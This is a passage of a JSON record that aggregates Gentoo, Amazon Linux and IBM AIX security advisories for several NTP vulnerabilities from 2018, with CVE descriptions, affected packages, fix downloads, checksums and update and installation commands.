\n\n### Workaround\n\nThere is no known workaround at this time.\n\n### Resolution\n\nAll NTP users should upgrade to the latest version:\n \n \n # emerge --sync\n # emerge --ask --oneshot --verbose \">=net-misc/ntp-4.2.8_p11\"", "edition": 1, "modified": "2018-05-26T00:00:00", "published": "2018-05-26T00:00:00", "id": "GLSA-201805-12", "href": "https://security.gentoo.org/glsa/201805-12", "title": "NTP: Multiple vulnerabilities", "type": "gentoo", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "amazon": [{"lastseen": "2020-11-10T12:35:20", "bulletinFamily": "unix", "cvelist": ["CVE-2018-7184", "CVE-2015-7704", "CVE-2018-7185", "CVE-2018-7183", "CVE-2018-7170", "CVE-2016-1549", "CVE-2018-7182"], "description": "**Issue Overview:**\n\nEphemeral association time spoofing additional protection \nntpd in ntp 4.2.x before 4.2.8p7 and 4.3.x before 4.3.92 allows authenticated users that know the private symmetric key to create arbitrarily-many ephemeral associations in order to win the clock selection of ntpd and modify a victim's clock via a Sybil attack. This issue exists because of an incomplete fix for [CVE-2016-1549 __](<https://access.redhat.com/security/cve/CVE-2016-1549>).([CVE-2018-7170 __](<https://access.redhat.com/security/cve/CVE-2018-7170>))\n\nInterleaved symmetric mode cannot recover from bad state \nntpd in ntp 4.2.8p4 before 4.2.8p11 drops bad packets before updating the "received" timestamp, which allows remote attackers to cause a denial of service (disruption) by sending a packet with a zero-origin timestamp causing the association to reset and setting the contents of the packet as the most recent timestamp. 
This issue is a result of an incomplete fix for [CVE-2015-7704 __](<https://access.redhat.com/security/cve/CVE-2015-7704>).([CVE-2018-7184 __](<https://access.redhat.com/security/cve/CVE-2018-7184>))\n\nEphemeral association time spoofing \nA malicious authenticated peer can create arbitrarily-many ephemeral associations in order to win the clock selection algorithm in ntpd in NTP 4.2.8p4 and earlier and NTPsec 3e160db8dc248a0bcb053b56a80167dc742d2b74 and a5fb34b9cc89b92a8fef2f459004865c93bb7f92 and modify a victim's clock.([CVE-2016-1549 __](<https://access.redhat.com/security/cve/CVE-2016-1549>))\n\nBuffer read overrun leads to information leak in ctl_getitem() \nThe ctl_getitem method in ntpd in ntp-4.2.8p6 before 4.2.8p11 allows remote attackers to cause a denial of service (out-of-bounds read) via a crafted mode 6 packet with an ntpd instance from 4.2.8p6 through 4.2.8p10. ([CVE-2018-7182 __](<https://access.redhat.com/security/cve/CVE-2018-7182>))\n\nUnauthenticated packet can reset authenticated interleaved association \nThe protocol engine in ntp 4.2.6 before 4.2.8p11 allows remote attackers to cause a denial of service (disruption) by continually sending a packet with a zero-origin timestamp and source IP address of the "other side" of an interleaved association causing the victim ntpd to reset its association.([CVE-2018-7185 __](<https://access.redhat.com/security/cve/CVE-2018-7185>))\n\ndecodearr() can write beyond its buffer limit \nBuffer overflow in the decodearr function in ntpq in ntp 4.2.8p6 through 4.2.8p10 allows remote attackers to execute arbitrary code by leveraging an ntpq query and sending a response with a crafted array.([CVE-2018-7183 __](<https://access.redhat.com/security/cve/CVE-2018-7183>))\n\n \n**Affected Packages:** \n\n\nntp\n\n \n**Issue Correction:** \nRun _yum update ntp_ to update your system. 
\n\n\n \n\n\n**New Packages:**\n \n \n i686: \n ntpdate-4.2.8p11-1.37.amzn1.i686 \n ntp-4.2.8p11-1.37.amzn1.i686 \n ntp-debuginfo-4.2.8p11-1.37.amzn1.i686 \n \n noarch: \n ntp-doc-4.2.8p11-1.37.amzn1.noarch \n ntp-perl-4.2.8p11-1.37.amzn1.noarch \n \n src: \n ntp-4.2.8p11-1.37.amzn1.src \n \n x86_64: \n ntpdate-4.2.8p11-1.37.amzn1.x86_64 \n ntp-4.2.8p11-1.37.amzn1.x86_64 \n ntp-debuginfo-4.2.8p11-1.37.amzn1.x86_64 \n \n \n", "edition": 5, "modified": "2018-05-10T17:01:00", "published": "2018-05-10T17:01:00", "id": "ALAS-2018-1009", "href": "https://alas.aws.amazon.com/ALAS-2018-1009.html", "title": "Medium: ntp", "type": "amazon", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-11-10T12:34:45", "bulletinFamily": "unix", "cvelist": ["CVE-2018-7184", "CVE-2016-9311", "CVE-2015-7704", "CVE-2016-7433", "CVE-2018-7185", "CVE-2018-7183", "CVE-2017-6462", "CVE-2016-7429", "CVE-2017-6463", "CVE-2016-9310", "CVE-2018-7170", "CVE-2016-1549", "CVE-2017-6464", "CVE-2018-7182", "CVE-2016-7426"], "description": "**Issue Overview:**\n\nEphemeral association time spoofing additional protection \nntpd in ntp 4.2.x before 4.2.8p7 and 4.3.x before 4.3.92 allows authenticated users that know the private symmetric key to create arbitrarily-many ephemeral associations in order to win the clock selection of ntpd and modify a victim's clock via a Sybil attack. This issue exists because of an incomplete fix for [CVE-2016-1549 __](<https://access.redhat.com/security/cve/CVE-2016-1549>).([CVE-2018-7170 __](<https://access.redhat.com/security/cve/CVE-2018-7170>))\n\nInterleaved symmetric mode cannot recover from bad state \nntpd in ntp 4.2.8p4 before 4.2.8p11 drops bad packets before updating the "received" timestamp, which allows remote attackers to cause a denial of service (disruption) by sending a packet with a zero-origin timestamp causing the association to reset and setting the contents of the packet as the most recent timestamp. 
This issue is a result of an incomplete fix for [CVE-2015-7704 __](<https://access.redhat.com/security/cve/CVE-2015-7704>).([CVE-2018-7184 __](<https://access.redhat.com/security/cve/CVE-2018-7184>))\n\nEphemeral association time spoofing \nA malicious authenticated peer can create arbitrarily-many ephemeral associations in order to win the clock selection algorithm in ntpd in NTP 4.2.8p4 and earlier and NTPsec 3e160db8dc248a0bcb053b56a80167dc742d2b74 and a5fb34b9cc89b92a8fef2f459004865c93bb7f92 and modify a victim's clock.([CVE-2016-1549 __](<https://access.redhat.com/security/cve/CVE-2016-1549>))\n\nBuffer read overrun leads to information leak in ctl_getitem() \nThe ctl_getitem method in ntpd in ntp-4.2.8p6 before 4.2.8p11 allows remote attackers to cause a denial of service (out-of-bounds read) via a crafted mode 6 packet with an ntpd instance from 4.2.8p6 through 4.2.8p10. ([CVE-2018-7182 __](<https://access.redhat.com/security/cve/CVE-2018-7182>))\n\nUnauthenticated packet can reset authenticated interleaved association \nThe protocol engine in ntp 4.2.6 before 4.2.8p11 allows remote attackers to cause a denial of service (disruption) by continually sending a packet with a zero-origin timestamp and source IP address of the "other side" of an interleaved association causing the victim ntpd to reset its association.([CVE-2018-7185 __](<https://access.redhat.com/security/cve/CVE-2018-7185>))\n\ndecodearr() can write beyond its buffer limit \nBuffer overflow in the decodearr function in ntpq in ntp 4.2.8p6 through 4.2.8p10 allows remote attackers to execute arbitrary code by leveraging an ntpq query and sending a response with a crafted array.([CVE-2018-7183 __](<https://access.redhat.com/security/cve/CVE-2018-7183>))\n\n \n**Affected Packages:** \n\n\nntp\n\n \n**Issue Correction:** \nRun _yum update ntp_ to update your system. 
\n\n\n \n\n\n**New Packages:**\n \n \n noarch: \n ntp-perl-4.2.6p5-28.amzn2.2.1.noarch \n ntp-doc-4.2.6p5-28.amzn2.2.1.noarch \n \n src: \n ntp-4.2.6p5-28.amzn2.2.1.src \n \n x86_64: \n ntp-4.2.6p5-28.amzn2.2.1.x86_64 \n ntpdate-4.2.6p5-28.amzn2.2.1.x86_64 \n sntp-4.2.6p5-28.amzn2.2.1.x86_64 \n ntp-debuginfo-4.2.6p5-28.amzn2.2.1.x86_64 \n \n \n", "edition": 1, "modified": "2018-05-10T17:11:00", "published": "2018-05-10T17:11:00", "id": "ALAS2-2018-1009", "href": "https://alas.aws.amazon.com/AL2/ALAS-2018-1009.html", "title": "Medium: ntp", "type": "amazon", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-11-10T12:35:28", "bulletinFamily": "unix", "cvelist": ["CVE-2018-12327", "CVE-2018-7170", "CVE-2016-1549"], "description": "**Issue Overview:**\n\nntpd in ntp 4.2.x before 4.2.8p7 allows authenticated users that know the private symmetric key to create arbitrarily-many ephemeral associations in order to win the clock selection of ntpd and modify a victim's clock via a Sybil attack. This issue exists because of an incomplete fix for [CVE-2016-1549 __](<https://access.redhat.com/security/cve/CVE-2016-1549>).([CVE-2018-7170 __](<https://access.redhat.com/security/cve/CVE-2018-7170>))\n\nThe ntpq and ntpdc command-line utilities that are part of ntp package are vulnerable to stack-based buffer overflow via crafted hostname. Applications using these vulnerable utilities with an untrusted input may be potentially exploited, resulting in a crash or arbitrary code execution under privileges of that application.([CVE-2018-12327 __](<https://access.redhat.com/security/cve/CVE-2018-12327>))\n\n \n**Affected Packages:** \n\n\nntp\n\n \n**Issue Correction:** \nRun _yum update ntp_ to update your system. 
\n\n\n \n\n\n**New Packages:**\n \n \n i686: \n ntpdate-4.2.8p12-1.39.amzn1.i686 \n ntp-4.2.8p12-1.39.amzn1.i686 \n ntp-debuginfo-4.2.8p12-1.39.amzn1.i686 \n \n noarch: \n ntp-perl-4.2.8p12-1.39.amzn1.noarch \n ntp-doc-4.2.8p12-1.39.amzn1.noarch \n \n src: \n ntp-4.2.8p12-1.39.amzn1.src \n \n x86_64: \n ntp-debuginfo-4.2.8p12-1.39.amzn1.x86_64 \n ntp-4.2.8p12-1.39.amzn1.x86_64 \n ntpdate-4.2.8p12-1.39.amzn1.x86_64 \n \n \n", "edition": 5, "modified": "2018-09-19T17:19:00", "published": "2018-09-19T17:19:00", "id": "ALAS-2018-1083", "href": "https://alas.aws.amazon.com/ALAS-2018-1083.html", "title": "Low: ntp", "type": "amazon", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "aix": [{"lastseen": "2020-04-22T00:52:09", "bulletinFamily": "unix", "cvelist": ["CVE-2018-7184", "CVE-2018-7185", "CVE-2018-7183", "CVE-2014-5209", "CVE-2018-7170", "CVE-2016-1549", "CVE-2018-7182"], "description": "IBM SECURITY ADVISORY\n\nFirst Issued: Tue Aug 14 14:48:57 CDT 2018\n\nThe most recent version of this document is available here:\nhttp://aix.software.ibm.com/aix/efixes/security/ntp_advisory10.asc\nhttps://aix.software.ibm.com/aix/efixes/security/ntp_advisory10.asc\nftp://aix.software.ibm.com/aix/efixes/security/ntp_advisory10.asc\n\nSecurity Bulletin: Vulnerabilities in NTP affect AIX\n\n===============================================================================\n\nSUMMARY:\n\n There are multiple vulnerabilities in NTPv3 and NTPv4 that affect AIX.\n\n\n===============================================================================\n\nVULNERABILITY DETAILS:\n\n NTPv3 is vulnerable to:\n\n CVEID: CVE-2014-5209\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-5209\n https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-5209\n DESCRIPTION: NTP could allow a remote attacker to obtain sensitive \n information. 
By sending a GET_RESTRICT control message, an attacker \n could exploit this vulnerability to obtain internal or alternative \n IP addresses and other sensitive information.\n CVSS Base Score: 5.0\n CVSS Temporal Score: See\n https://exchange.xforce.ibmcloud.com/vulnerabilities/95841\n for the current score\n CVSS Environmental Score*: Undefined\n CVSS Vector: (AV:N/AC:L/Au:N/C:P/I:N/A:N)\n\n NTPv3 and NTPv4 are vulnerable to:\n\n CVEID: CVE-2018-7182\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-7182\n https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-7182\n DESCRIPTION: NTP could allow a remote attacker to obtain sensitive \n information, caused by a leak in the ctl_getitem() function. By \n sending a specially crafted mode 6 packet, an attacker could exploit \n this vulnerability to read past the end of its buffer.\n CVSS Base Score: 5.3 \n CVSS Temporal Score: See\n https://exchange.xforce.ibmcloud.com/vulnerabilities/139785\n for the current score\n CVSS Environmental Score*: Undefined\n CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N)\n\n CVEID: CVE-2018-7183\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-7183\n https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-7183\n DESCRIPTION: NTP is vulnerable to a buffer overflow, caused by improper \n bounds checking by the decodearr function. 
By leveraging an ntpq \n query and sending a response with a crafted array, a remote attacker \n could overflow a buffer and execute arbitrary code on the system or \n cause the application to crash.\n CVSS Base Score: 5.6\n CVSS Temporal Score: See\n https://exchange.xforce.ibmcloud.com/vulnerabilities/140092\n for the current score\n CVSS Environmental Score*: Undefined\n CVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:L)\n\n NTPv4 is vulnerable to:\n\n CVEID: CVE-2018-7170\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-7170\n https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-7170\n DESCRIPTION: NTP could allow a remote authenticated attacker to bypass \n security restrictions, caused by a Sybil attack. By creating many \n ephemeral associations, an attacker could exploit this vulnerability \n to win the clock selection of ntpd and modify a victim's clock. \n CVSS Base Score: 3.1\n CVSS Temporal Score: See \n https://exchange.xforce.ibmcloud.com/vulnerabilities/139786\n for the current score\n CVSS Environmental Score*: Undefined\n CVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:L/UI:N/S:U/C:N/I:L/A:N)\n\n CVEID: CVE-2018-7184\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-7184\n https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-7184\n DESCRIPTION: NTP is vulnerable to a denial of service, caused by the \n failure of the interleaved symmetric mode to recover from bad state. 
\n By sending specially crafted packets, a remote authenticated \n attacker could exploit this vulnerability to cause a denial of \n service.\n CVSS Base Score: 3.1\n CVSS Temporal Score: See\n https://exchange.xforce.ibmcloud.com/vulnerabilities/139784\n for the current score\n CVSS Environmental Score*: Undefined\n CVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:L)\n\n CVEID: CVE-2018-7185\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-7185\n https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-7185\n DESCRIPTION: NTP is vulnerable to a denial of service. By sending \n specially crafted packets, a remote authenticated attacker could \n exploit this vulnerability to reset authenticated interleaved \n association.\n CVSS Base Score: 3.1\n CVSS Temporal Score: See\n https://exchange.xforce.ibmcloud.com/vulnerabilities/139783\n for the current score\n CVSS Environmental Score*: Undefined\n CVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:L)\n\n CVEID: CVE-2016-1549\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-1549\n https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-1549\n DESCRIPTION: NTP could allow a remote authenticated attacker to \n bypass security restrictions, caused by the failure to prevent \n Sybil attacks from authenticated peers. 
By creating multiple \n ephemeral associations to win the clock selection of ntpd, an \n attacker could exploit this vulnerability to modify a victim's \n clock.\n CVSS Base Score: 5.3 \n CVSS Temporal Score: See \n https://exchange.xforce.ibmcloud.com/vulnerabilities/112741 \n for the current score \n CVSS Environmental Score*: Undefined\n CVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:L/UI:N/S:U/C:N/I:H/A:N)\n\n\n AFFECTED PRODUCTS AND VERSIONS:\n \n AIX 5.3, 6.1, 7.1, 7.2\n VIOS 2.2.x \n\n The vulnerabilities in the following filesets are being addressed:\n \n key_fileset = aix\n\n For NTPv3:\n\n Fileset Lower Level Upper Level KEY PRODUCT(S) \n ---------------------------------------------------------------------\n bos.net.tcp.client 5.3.12.0 5.3.12.10 key_w_fs NTPv3\n bos.net.tcp.client 6.1.9.0 6.1.9.315 key_w_fs NTPv3\n bos.net.tcp.client 7.1.4.0 7.1.4.33 key_w_fs NTPv3\n bos.net.tcp.client 7.1.5.0 7.1.5.15 key_w_fs NTPv3\n bos.net.tcp.ntpd 7.2.0.0 7.2.0.4 key_w_fs NTPv3\n bos.net.tcp.ntpd 7.2.1.0 7.2.1.2 key_w_fs NTPv3\n bos.net.tcp.ntpd 7.2.2.0 7.2.2.15 key_w_fs NTPv3\n\n For NTPv4:\n\n Fileset Lower Level Upper Level KEY PRODUCT(S)\n ---------------------------------------------------------------------\n ntp.rte 7.4.2.8100 7.4.2.8100 key_w_fs NTPv4 \n\n \n To find out whether the affected filesets are installed \n on your systems, refer to the lslpp command found in AIX user's guide.\n\n Example: lslpp -L | grep -i bos.net.tcp.client\n\n\n REMEDIATION:\n\n A. 
APARS\n \n IBM has assigned the following APARs to this problem:\n\n For NTPv3:\n\n AIX Level APAR Availability SP KEY PRODUCT(S)\n ------------------------------------------------------------\n 5.3.12 IJ06657 ** N/A key_w_apar NTPv3\n 6.1.9 IJ06651 ** SP12 key_w_apar NTPv3\n 7.1.4 IJ06652 ** SP7 key_w_apar NTPv3\n 7.1.5 IJ06653 ** SP3 key_w_apar NTPv3\n 7.2.0 IJ06654 ** N/A key_w_apar NTPv3\n 7.2.1 IJ06655 ** SP5 key_w_apar NTPv3\n 7.2.2 IJ06656 ** SP3 key_w_apar NTPv3\n\n VIOS Level APAR Availability SP KEY PRODUCT(S)\n ----------------------------------------------------------------\n 2.2.4 IJ06651 ** N/A key_w_apar NTPv3\n 2.2.5 IJ06651 ** 2.2.5.50 key_w_apar NTPv3\n 2.2.6 IJ06651 ** 2.2.6.30 key_w_apar NTPv3\n\n For NTPv4:\n\n AIX Level APAR Availability SP KEY PRODUCT(S)\n ------------------------------------------------------------\n 6.1.9 IJ06400 ** SP12 key_w_apar NTPv4\n 7.1.4 IJ06400 ** SP7 key_w_apar NTPv4\n 7.1.5 IJ06400 ** SP3 key_w_apar NTPv4\n 7.2.0 IJ06400 ** N/A key_w_apar NTPv4\n 7.2.1 IJ06400 ** SP5 key_w_apar NTPv4\n 7.2.2 IJ06400 ** SP3 key_w_apar NTPv4\n\n VIOS Level APAR Availability SP KEY PRODUCT(S)\n ----------------------------------------------------------------\n 2.2.4 IJ06400 ** N/A key_w_apar NTPv4\n 2.2.5 IJ06400 ** 2.2.5.50 key_w_apar NTPv4\n 2.2.6 IJ06400 ** 2.2.6.30 key_w_apar NTPv4\n\n Subscribe to the APARs here:\n\n http://www.ibm.com/support/docview.wss?uid=isg1IJ06400\n http://www.ibm.com/support/docview.wss?uid=isg1IJ06651\n http://www.ibm.com/support/docview.wss?uid=isg1IJ06652\n http://www.ibm.com/support/docview.wss?uid=isg1IJ06653\n http://www.ibm.com/support/docview.wss?uid=isg1IJ06654\n http://www.ibm.com/support/docview.wss?uid=isg1IJ06655\n http://www.ibm.com/support/docview.wss?uid=isg1IJ06656\n\n https://www.ibm.com/support/docview.wss?uid=isg1IJ06400\n https://www.ibm.com/support/docview.wss?uid=isg1IJ06651\n https://www.ibm.com/support/docview.wss?uid=isg1IJ06652\n 
https://www.ibm.com/support/docview.wss?uid=isg1IJ06653\n https://www.ibm.com/support/docview.wss?uid=isg1IJ06654\n https://www.ibm.com/support/docview.wss?uid=isg1IJ06655\n https://www.ibm.com/support/docview.wss?uid=isg1IJ06656\n\n By subscribing, you will receive periodic email alerting you\n to the status of the APAR, and a link to download the fix once\n it becomes available.\n\n B. FIXES\n\n AIX and VIOS fixes are available.\n\n The AIX/VIOS fixes can be downloaded via ftp or http from:\n\n ftp://aix.software.ibm.com/aix/efixes/security/ntp_fix10.tar\n http://aix.software.ibm.com/aix/efixes/security/ntp_fix10.tar\n https://aix.software.ibm.com/aix/efixes/security/ntp_fix10.tar \n\n The link above is to a tar file containing this signed\n advisory, fix packages, and OpenSSL signatures for each package.\n The fixes below include prerequisite checking. This will\n enforce the correct mapping between the fixes and AIX\n Technology Levels.\n \n For NTPv3:\n \n AIX Level Interim Fix (*.Z) KEY PRODUCT(S)\n ----------------------------------------------------------\n 5.3.12.9 IJ06657m9a.180529.epkg.Z key_w_fix NTPv3\n 6.1.9.9 IJ06651m9a.180528.epkg.Z key_w_fix NTPv3\n 6.1.9.10 IJ06651m9a.180528.epkg.Z key_w_fix NTPv3\n 6.1.9.11 IJ06651m9a.180528.epkg.Z key_w_fix NTPv3\n 7.1.4.4 IJ06652m4a.180528.epkg.Z key_w_fix NTPv3\n 7.1.4.5 IJ06652m4a.180528.epkg.Z key_w_fix NTPv3\n 7.1.4.6 IJ06652m4a.180528.epkg.Z key_w_fix NTPv3\n 7.1.5.0 IJ06653m0a.180527.epkg.Z key_w_fix NTPv3\n 7.1.5.1 IJ06653m0a.180527.epkg.Z key_w_fix NTPv3\n 7.1.5.2 IJ06653m0a.180527.epkg.Z key_w_fix NTPv3\n 7.2.0.4 IJ06654m4a.180527.epkg.Z key_w_fix NTPv3\n 7.2.0.5 IJ06654m4a.180527.epkg.Z key_w_fix NTPv3\n 7.2.0.6 IJ06654m4a.180527.epkg.Z key_w_fix NTPv3\n 7.2.1.2 IJ06655m2a.180527.epkg.Z key_w_fix NTPv3\n 7.2.1.3 IJ06655m2a.180527.epkg.Z key_w_fix NTPv3\n 7.2.1.4 IJ06655m2a.180527.epkg.Z key_w_fix NTPv3\n 7.2.2.0 IJ06656m0a.180527.epkg.Z key_w_fix NTPv3\n 7.2.2.1 IJ06656m0a.180527.epkg.Z key_w_fix 
NTPv3\n 7.2.2.2 IJ06656m0a.180527.epkg.Z key_w_fix NTPv3\n\n Please note that the above table refers to AIX TL/SP level as\n opposed to fileset level, i.e., 7.2.2.2 is AIX 7200-02-02.\n\n\n VIOS Level Interim Fix (*.Z) KEY PRODUCT(S)\n -----------------------------------------------------------\n 2.2.4.40 IJ06651m9a.180528.epkg.Z key_w_fix NTPv3\n 2.2.4.50 IJ06651m9a.180528.epkg.Z key_w_fix NTPv3\n 2.2.4.60 IJ06651m9a.180528.epkg.Z key_w_fix NTPv3\n 2.2.5.20 IJ06651m9a.180528.epkg.Z key_w_fix NTPv3\n 2.2.5.30 IJ06651m9a.180528.epkg.Z key_w_fix NTPv3\n 2.2.5.40 IJ06651m9a.180528.epkg.Z key_w_fix NTPv3\n 2.2.6.0 IJ06651m9a.180528.epkg.Z key_w_fix NTPv3\n 2.2.6.10 IJ06651m9a.180528.epkg.Z key_w_fix NTPv3\n 2.2.6.2x IJ06651m9a.180528.epkg.Z key_w_fix NTPv3\n\n\n For NTPv4:\n\n AIX Level Interim Fix (*.Z) KEY PRODUCT(S)\n ----------------------------------------------------------\n 6.1.x IJ06400s9a.180514.epkg.Z key_w_fix NTPv4\n 7.1.x IJ06400s9a.180514.epkg.Z key_w_fix NTPv4\n 7.2.x IJ06400s9a.180514.epkg.Z key_w_fix NTPv4\n\n VIOS Level Interim Fix (*.Z) KEY PRODUCT(S)\n -----------------------------------------------------------\n 2.2.x IJ06400s9a.180514.epkg.Z key_w_fix NTPv4\n\n To extract the fixes from the tar file:\n\n tar xvf ntp_fix10.tar \n cd ntp_fix10\n\n Verify you have retrieved the fixes intact:\n\n The checksums below were generated using the\n \"openssl dgst -sha256 file\" command as the following:\n\n openssl dgst -sha256 filename KEY\n -----------------------------------------------------------------------------------------------------\n 456eefb0975171e71cedd71431b6e23ebf16b226c4344a34b9c6452cb862fc42 IJ06400s9a.180514.epkg.Z key_w_csum\n e17cc1dc210f3b8f802d4b52cda05f1a89cd6de2cea371e9a7bea5452dd686f5 IJ06651m9a.180528.epkg.Z key_w_csum\n 3c92a6063d36be79cd716843fc8221f96911922a62b91a20e86d10ead054255a IJ06652m4a.180528.epkg.Z key_w_csum\n 17f7a37fedba73dd7e3862ced003436b22c5b74c7ca8dcc0dcde3306cff0d64f IJ06653m0a.180527.epkg.Z key_w_csum\n 
7792b56540634644b2fb9b47a8d5449eb62a89ea83e965e265d5b3fe3a2d01bd IJ06654m4a.180527.epkg.Z key_w_csum\n 223874b300b8a4201c6f6cdc0eb53bc09e4c22f9f00902713143b3df3569e0c0 IJ06655m2a.180527.epkg.Z key_w_csum\n f0e0c59274a89dc18064f8e49d4fa47de870e94b3b2d84d841f2e41c890cd035 IJ06656m0a.180527.epkg.Z key_w_csum\n 4a8e6ba8e5f5bf6651c339ee8ccffbcf6cd50f5004f1598d0ac70ecfe58ee823 IJ06657m9a.180529.epkg.Z key_w_csum\n\n These sums should match exactly. The OpenSSL signatures in the tar\n file and on this advisory can also be used to verify the\n integrity of the fixes. If the sums or signatures cannot be\n confirmed, contact IBM Support at\n http://ibm.com/support/ and describe the discrepancy. \n \n openssl dgst -sha1 -verify [pubkey_file] -signature [advisory_file].sig [advisory_file]\n \n openssl dgst -sha1 -verify [pubkey_file] -signature [ifix_file].sig [ifix_file]\n\n Published advisory OpenSSL signature file location:\n \n http://aix.software.ibm.com/aix/efixes/security/ntp_advisory10.asc.sig\n https://aix.software.ibm.com/aix/efixes/security/ntp_advisory10.asc.sig\n ftp://aix.software.ibm.com/aix/efixes/security/ntp_advisory10.asc.sig \n\n C. FIX AND INTERIM FIX INSTALLATION\n\n If possible, it is recommended that a mksysb backup of the system \n be created. 
Verify it is both bootable and readable before\n proceeding.\n\n The fix will not take effect until any running xntpd servers\n have been stopped and restarted with the following commands:\n\n stopsrc -s xntpd\n startsrc -s xntpd\n\n To preview a fix installation:\n\n installp -a -d fix_name -p all # where fix_name is the name of the\n # fix package being previewed.\n To install a fix package:\n\n installp -a -d fix_name -X all # where fix_name is the name of the\n # fix package being installed.\n\n After installation the ntp daemon must be restarted:\n\n stopsrc -s xntpd\n startsrc -s xntpd\n\n Interim fixes have had limited functional and regression\n testing but not the full regression testing that takes place\n for Service Packs; however, IBM does fully support them.\n\n Interim fix management documentation can be found at:\n\n http://www14.software.ibm.com/webapp/set2/sas/f/aix.efixmgmt/home.html\n\n To preview an interim fix installation:\n\n emgr -e ipkg_name -p # where ipkg_name is the name of the\n # interim fix package being previewed.\n\n To install an interim fix package:\n\n emgr -e ipkg_name -X # where ipkg_name is the name of the\n # interim fix package being installed.\n\n WORKAROUNDS AND MITIGATIONS:\n\n None.\n\n\n===============================================================================\n\nCONTACT US:\n\n Note: Keywords labeled as KEY in this document are used for parsing\n purposes.\n\n If you would like to receive AIX Security Advisories via email,\n please visit \"My Notifications\":\n\n http://www.ibm.com/support/mynotifications\n\n To view previously issued advisories, please visit:\n\n http://www14.software.ibm.com/webapp/set2/subscriptions/onvdq\n \n Contact IBM Support for questions related to this announcement:\n\n http://ibm.com/support/\n https://ibm.com/support/\n\n To obtain the OpenSSL public key that can be used to verify the\n signed advisories and ifixes:\n\n Download the key from our web page:\n\n 
ftp://ftp.software.ibm.com/systems/power/AIX/systems_p_os_aix_security_pubkey.txt\n\n Please contact your local IBM AIX support center for any\n assistance.\n\n\nREFERENCES:\n \n Complete CVSS v3 Guide: http://www.first.org/cvss/user-guide\n On-line Calculator v3:\n http://www.first.org/cvss/calculator/3.0\n\n\nRELATED INFORMATION:\n\n IBM Secure Engineering Web Portal\n http://www.ibm.com/security/secure-engineering/bulletins.html\n\n IBM Product Security Incident Response Blog\n https://www.ibm.com/blogs/psirt/\n\n Security Bulletin: Vulnerabilities in NTP affect AIX \n https://www-01.ibm.com/support/docview.wss?uid=ibm10718835\n\nACKNOWLEDGEMENTS:\n\n None.\n\n\nCHANGE HISTORY:\n\n First Issued: Tue Aug 14 14:48:57 CDT 2018\n\n\n===============================================================================\n\n*The CVSS Environment Score is customer environment specific and will \nultimately impact the Overall CVSS Score. Customers can evaluate the impact \nof this vulnerability in their environments by accessing the links in the \nReference section of this Security Bulletin. \n\nDisclaimer\nAccording to the Forum of Incident Response and Security Teams (FIRST), the \nCommon Vulnerability Scoring System (CVSS) is an \"industry open standard \ndesigned to convey vulnerability severity and help to determine urgency and \npriority of response.\" IBM PROVIDES THE CVSS SCORES \"AS IS\" WITHOUT WARRANTY \nOF ANY KIND, INCLUDING THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS \nFOR A PARTICULAR PURPOSE. 
CUSTOMERS ARE RESPONSIBLE FOR ASSESSING THE IMPACT \nOF ANY ACTUAL OR POTENTIAL SECURITY VULNERABILITY.\n\n\n\n", "edition": 15, "modified": "2018-08-14T14:48:57", "published": "2018-08-14T14:48:57", "id": "NTP_ADVISORY10.ASC", "href": "https://aix.software.ibm.com/aix/efixes/security/ntp_advisory10.asc", "title": "Vulnerabilities in NTP affect AIX,Vulnerabilities in NTP affect VIOS", "type": "aix", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T19:19:13", "bulletinFamily": "unix", "cvelist": ["CVE-2018-12327", "CVE-2018-7170"], "description": "IBM SECURITY ADVISORY\n\nFirst Issued: Fri Dec 14 12:20:13 CST 2018\n\nThe most recent version of this document is available here:\nhttp://aix.software.ibm.com/aix/efixes/security/ntp_advisory11.asc\nhttps://aix.software.ibm.com/aix/efixes/security/ntp_advisory11.asc\nftp://aix.software.ibm.com/aix/efixes/security/ntp_advisory11.asc\n\nSecurity Bulletin: Vulnerabilities in NTPv4 affect AIX (CVE-2018-12327, \n CVE-2018-7170)\n\n===============================================================================\n\nSUMMARY:\n\n There are vulnerabilities in NTPv4 that affect AIX.\n\n\n===============================================================================\n\nVULNERABILITY DETAILS:\n\n NTPv4 is vulnerable to:\n\n CVEID: CVE-2018-12327\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-12327\n https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-12327\n DESCRIPTION: NTP is vulnerable to a stack-based buffer overflow, caused \n by improper bounds checking by ntpq and ntpdc. 
